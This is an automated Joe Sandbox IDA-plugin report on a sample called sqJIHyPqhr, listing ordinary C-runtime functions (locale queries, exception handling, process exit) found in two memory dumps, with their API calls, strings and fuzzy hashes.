Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: Create$BrushCapsClientDeviceFontModeNtdllProc_RectRectangleSolidWindow_wcslen
String ID:
API String ID: 1529870607-0
Opcode ID: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
Instruction ID: 0e8c66200a156209604e3b11d28845cf983622776adc4df011ad4ef82ec777ea
Opcode Fuzzy Hash: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
Instruction Fuzzy Hash: 1C71FF72900228AFDB62DF68DD85FAEB7BCEB09711F0041A9F509E6151DA70AF84CF10

Function 0043D678 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0043D7BE

Strings

1#QNAN, xrefs: 0043E9C4
1#SNAN, xrefs: 0043E9BD
1#INF, xrefs: 0043E9CB
1#IND, xrefs: 0043E9B6

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 1705c8ec1ca245728102af4e988fb3fc25a52218aafbc3cd1121bd07fbf397af
Instruction ID: 9e6dbbf50b3e3cea2dd72b1fc58d7ba5eae27dc46f9bc3f4d00a4e89d85e9552
Opcode Fuzzy Hash: 1705c8ec1ca245728102af4e988fb3fc25a52218aafbc3cd1121bd07fbf397af
Instruction Fuzzy Hash: 96C25B71E096288FDB25CE29DD407EAB7B5EB48304F1551EBD80DE7280E778AE818F45

Function 024DB9D5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,024DBCF4,?,00000000), ref: 024DBA6E
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,024DBCF4,?,00000000), ref: 024DBA97
GetACP.KERNEL32(?,?,024DBCF4,?,00000000), ref: 024DBAAC

Strings

ACP, xrefs: 024DB9F3
OCP, xrefs: 024DBA29

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction ID: 29a921cb51f8c3ca3c960b7cff2a070b53e544459cba5c2c56387bf256feb7a6
Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction Fuzzy Hash: D1218336700105AAEB348F55D925BA777A6EB44E5CB57C067E90ADB300F732DE81C394

Function 0043B76E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B807
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B830
GetACP.KERNEL32(?,?,0043BA8D,?,00000000), ref: 0043B845

Strings

OCP, xrefs: 0043B7C2
ACP, xrefs: 0043B78C

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction ID: fa2a6f3f06b8257a5ac591d998b536fc1da73be0d13f1331aa64b533421ee897
Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction Fuzzy Hash: 4B21A136A00104AAD738DF14C801B9777AAEF98F50F669466EB0AD7311E736DE41C7D8

Function 024DBBA9 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024D2141: GetLastError.KERNEL32(?,?,024CA9EC,?,00000000,?,024CCDE6,024A247E,00000000,?,00451F20), ref: 024D2145
Part of subcall function 024D2141: _free.LIBCMT ref: 024D2178
Part of subcall function 024D2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024D21B9

Part of subcall function 024D2141: _free.LIBCMT ref: 024D21A0
Part of subcall function 024D2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024D21AD

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 024DBCB5
IsValidCodePage.KERNEL32(00000000), ref: 024DBD10
IsValidLocale.KERNEL32(?,00000001), ref: 024DBD1F
GetLocaleInfoW.KERNEL32(?,00001001,024D0A1C,00000040,?,024D0B3C,00000055,00000000,?,?,00000055,00000000), ref: 024DBD67
GetLocaleInfoW.KERNEL32(?,00001002,024D0A9C,00000040), ref: 024DBD86

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
String ID:
API String ID: 2287132625-0
Opcode ID: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
Instruction ID: 32782948bc3ccb76edf1ff4d5e6531e373f3e65276f1eb09355d6d9ef3311abe
Opcode Fuzzy Hash: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
Instruction Fuzzy Hash: FE5193719002099BEF11DFA5CC60ABF77B9FF14B08F06082FE900E7294EB719A418B61

Function 0043B942 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0043BA4E
IsValidCodePage.KERNEL32(00000000), ref: 0043BAA9
IsValidLocale.KERNEL32(?,00000001), ref: 0043BAB8
GetLocaleInfoW.KERNEL32(?,00001001,004307B5,00000040,?,004308D5,00000055,00000000,?,?,00000055,00000000), ref: 0043BB00
GetLocaleInfoW.KERNEL32(?,00001002,00430835,00000040), ref: 0043BB1F

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
String ID:
API String ID: 2287132625-0
Opcode ID: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
Instruction ID: d022b458b050368e3858f313ea430915e0084ddf9245bc07a5b1b9775f8f1cbc
Opcode Fuzzy Hash: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
Instruction Fuzzy Hash: E1516171A006059BEB10EFA5CC45BBF73B8FF4C701F14556BEA14E7290E7789A048BA9

Function 0042EAE0 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 464COMMON

Download Yara Rule

Strings

C, xrefs: 0042EAFD, 0042ECA8, 0042EECC, 0042EE66, 0042ECF6, 0042EC84
C, xrefs: 0042EF48, 0042ED32, 0042EBC1

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID:
String ID: C$C
API String ID: 0-238425240
Opcode ID: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
Instruction ID: c20898a9e1ba257a9a920a277c678998c6649ecb9dd7e2fb432374692491c933
Opcode Fuzzy Hash: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
Instruction Fuzzy Hash: D2025C71E002299BDF14CFAAD9806AEBBF1EF88314F65416AD919E7380D734A9418B94

Function 024DB271 Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024D2141: GetLastError.KERNEL32(?,?,024CA9EC,?,00000000,?,024CCDE6,024A247E,00000000,?,00451F20), ref: 024D2145
Part of subcall function 024D2141: _free.LIBCMT ref: 024D2178
Part of subcall function 024D2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024D21B9

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,024D0A23,?,?,?,?,024D047A,?,00000004), ref: 024DB353
_wcschr.LIBVCRUNTIME ref: 024DB3E3
_wcschr.LIBVCRUNTIME ref: 024DB3F1
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,024D0A23,00000000,024D0B43), ref: 024DB494

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
String ID:
API String ID: 2444527052-0
Opcode ID: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
Instruction ID: 7c1cd337955dd42237f06a01f7eacb69faea9126d7ffb20bf45f3db75c6b65ab
Opcode Fuzzy Hash: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
Instruction Fuzzy Hash: D961E772600606ABEB25EF35DC65BBB73ADEF04718F15442FE905DB280EB74E5418BA0

Function 0043B00A Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004307BC,?,?,?,?,00430213,?,00000004), ref: 0043B0EC
_wcschr.LIBVCRUNTIME ref: 0043B17C
_wcschr.LIBVCRUNTIME ref: 0043B18A
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004307BC,00000000,004308DC), ref: 0043B22D

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
String ID:
API String ID: 2444527052-0
Opcode ID: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
Instruction ID: 51baba79e9d53baeee2bb674299bb26a4ab80324ce8bdae5682f18c88f981068
Opcode Fuzzy Hash: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
Instruction Fuzzy Hash: 2A611871600305AADB25AB35DC46FAB73A8EF0C754F14142FFA15D7281EB78E90087E9

Function 0043B3F5 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B449
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B49A
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B55A

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: ErrorInfoLastLocale$_free
String ID:
API String ID: 2834031935-0
Opcode ID: b47dfc7cc7d128076792c5fbd0b190a68a95fbe03c58a2560eecab0ba078b5b3
Instruction ID: c49451ec2ca19e0a4411bfa9fc43b71b3add14360d4f89f5b475bf5440394a21
Opcode Fuzzy Hash: b47dfc7cc7d128076792c5fbd0b190a68a95fbe03c58a2560eecab0ba078b5b3
Instruction Fuzzy Hash: D561A771501207AFEB289F25CC82BBA77A8EF08714F10507BEE05CA681E77DD951CB99

Function 024CA63A Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,024ADAD7), ref: 024CA732
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,024ADAD7), ref: 024CA73C
UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,024ADAD7), ref: 024CA749

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
Instruction ID: 626e4970af3046aff01b5f396fb40061e1e5dca619a53406ab9348aa7a6f6694
Opcode Fuzzy Hash: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
Instruction Fuzzy Hash: EB31C67490122CABCB61DF69D9887DDBBB8BF18711F6042EAE40CA7250E7309B858F44

Function 0042A3D3 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042A4CB
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0042A4D5
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042A4E2

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
Instruction ID: 57e1c3994b5eabbb9df0cdc6b85fdffdc982c490f91e1a39e2279c764f1972c3
Opcode Fuzzy Hash: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
Instruction Fuzzy Hash: C231D6749112289BCB21DF64D9887CDB7B8BF08710F5042EAE81CA7250EB749F958F49

Function 024D00C6 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,024D009C,00000000,00457970,0000000C,024D01F3,00000000,00000002,00000000), ref: 024D00E7
TerminateProcess.KERNEL32(00000000,?,024D009C,00000000,00457970,0000000C,024D01F3,00000000,00000002,00000000), ref: 024D00EE
ExitProcess.KERNEL32 ref: 024D0100

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction ID: 54e88e73f246356a51daebed9234b39cbfb70eae6ed8c4336b89a175edfc4d76
Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction Fuzzy Hash: 78E0B635000548EBCF126F55DD18A593F6AEB46B46F54402AF9058B231CB36DA42DE44

Function 0042FE5F Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE80
TerminateProcess.KERNEL32(00000000,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE87
ExitProcess.KERNEL32 ref: 0042FE99

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction ID: 8c82726c098bb25b52c6af08a7b8273a11ccbc153eb778ed9611e77f52f83783
Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction Fuzzy Hash: B3E04635100148ABCF126F50ED08A5A3B39FF09B56F810439F8068B236CB39EE42CA88

Function 024A092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

GetProcAddress., xrefs: 024A09DC, 024A09DF, 024A09E4
l, xrefs: 024A0966
., xrefs: 024A095F

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 83b1f6a1e96997a5a0f1650ef269b331ccf1d5237051adc979373b0a2e30b189
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 733127B6900609DFEB10CF99C884BAEBBF9FF58324F15504AD841A7310D771EA45CBA4

Function 024D8C59 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 024D8D23

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
Instruction ID: d85d8dee3e90d8daf1d0437d29076fa47462436021d2d8eb2ba51ac876f0bcee
Opcode Fuzzy Hash: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
Instruction Fuzzy Hash: 39410876500219AFCB209FB9DC58EBB7779EB84714F50466EF905D7280E7319D42CB50

Function 004389F2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 00438ABC

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
Instruction ID: b1d1c733bd69e792f2c7091433d2a564ecb1a1065cd437496777377bd66813c7
Opcode Fuzzy Hash: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
Instruction Fuzzy Hash: 1A412B725003196FCB20AFB9DC49EBBB778EB88714F50566EF905D7280EA34AD41CB58

Function 004351C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00430213,?,00000004), ref: 00435213

Strings

GetLocaleInfoEx, xrefs: 004351D1, 004351DB

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
Instruction ID: 6c622d5e0ad0a6d1c05e93c1424bc95a701370efe176ef79413d4e55be9de99b
Opcode Fuzzy Hash: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
Instruction Fuzzy Hash: 97F02B31680318BBDB016F51CC02F6F7B21EF18B02F10006BFC0567290DA799E20AADE

Function 024CED47 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
Instruction ID: 570c992c6f964cf7d08cbd3f112a0dbb40093d4f48d4c61d764f9d2695176ec2
Opcode Fuzzy Hash: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
Instruction Fuzzy Hash: 63022B75E002199BDF54CFADC8806AEB7F2EF48324F25816ED919E7380D735A945CB90

Function 024A2605 Relevance: 3.1, APIs: 2, Instructions: 125nativewindowCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 024A262C
PostQuitMessage.USER32(00000000), ref: 024A27CA

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: MessageNtdllPostProc_QuitWindow
String ID:
API String ID: 4264772764-0
Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
Instruction ID: 4131593c5325b6d7a27996fea621bafce29a0c1cb8874c88a1ca774810e82398
Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
Instruction Fuzzy Hash: E541412596434095E730FFA5BC55B2633B0FF64B22F10252BD528CB2B2E3B28540C75E

Function 024D6F26 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,024D6F21,?,?,00000008,?,?,024DF3E2,00000000), ref: 024D7153

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction ID: b41872cf36f18aac3f0e420d72c941380e7b4fb529bb315fd269d7bb5fe6de57
Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction Fuzzy Hash: E6B14B312106089FD716CF28C49AB69BBE1FF45368F658659E89ACF3E1C335D992CB40

Function 00436CBF Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00436CBA,?,?,00000008,?,?,0043F17B,00000000), ref: 00436EEC

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction ID: 64e3da0580c1687aacde15a9aed21cd267913b72937e2db5c37d982a735c0e1f
Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction Fuzzy Hash: 69B17D35210609EFD714CF28C48AB657BE0FF09324F26D659E899CF2A1C339E992CB44

Function 024DB8AC Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 024D2141: GetLastError.KERNEL32(?,?,024CA9EC,?,00000000,?,024CCDE6,024A247E,00000000,?,00451F20), ref: 024D2145
Part of subcall function 024D2141: _free.LIBCMT ref: 024D2178
Part of subcall function 024D2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024D21B9

Part of subcall function 024D2141: _free.LIBCMT ref: 024D21A0
Part of subcall function 024D2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024D21AD

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 024DB900

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale
String ID:
API String ID: 2955987475-0
Opcode ID: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
Instruction ID: f44696654a57d3047933fd298932f5a799d61d0299570dfed513d296e2c4a412
Opcode Fuzzy Hash: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
Instruction Fuzzy Hash: DF21CF32A5024AABDF24AF25DC61BBB77ACEF04318F0141BBED01D6251EB79D945CB50

Function 0043B645 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B699

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: ErrorLast$_free$InfoLocale
String ID:
API String ID: 2955987475-0
Opcode ID: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
Instruction ID: d046272b768734764790121d12bbe36070ecd09619f9604c2cd6a0fe40238023
Opcode Fuzzy Hash: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
Instruction Fuzzy Hash: B421B67251020AABDB249E65CC42BBB73A8EF48314F10107BFE01D6281EB79DD44CB99

Function 024DB534 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024D2141: GetLastError.KERNEL32(?,?,024CA9EC,?,00000000,?,024CCDE6,024A247E,00000000,?,00451F20), ref: 024D2145
Part of subcall function 024D2141: _free.LIBCMT ref: 024D2178
Part of subcall function 024D2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024D21B9

